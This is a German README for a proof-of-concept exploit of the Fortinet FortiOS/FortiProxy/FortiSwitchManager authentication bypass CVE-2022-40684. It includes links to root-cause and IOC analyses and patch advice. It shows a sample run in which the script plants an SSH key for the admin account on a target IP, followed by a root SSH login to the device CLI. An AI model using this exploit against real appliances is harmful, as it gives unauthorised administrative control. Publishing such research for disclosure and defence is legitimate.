
Ein Proof-of-Concept-Exploit für CVE-2022-40684, der Fortinet FortiOS, FortiProxy und FortiSwitchManager betrifft.
POC für CVE-2022-40684, der Fortinet FortiOS-, FortiProxy- und FortiSwitchManager-Appliances betrifft.
Eine technische Root-Cause-Analyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Zur Analyse von Fortinet-Logs auf Indikatoren für eine Kompromittierung und zur Aktivierung detaillierterer Logs besuchen Sie unseren IOC-Blog: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Dieser POC nutzt die Authentication-Bypass-Schwachstelle aus, um einen SSH-Schlüssel für den angegebenen Benutzer zu setzen.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Aktualisieren Sie auf die neueste Version oder beheben Sie die Schwachstelle, indem Sie den Anweisungen im Fortinet PSIRT folgen:
Diese Software wurde ausschließlich für akademische Forschungszwecke und die Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektverantwortlichen sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.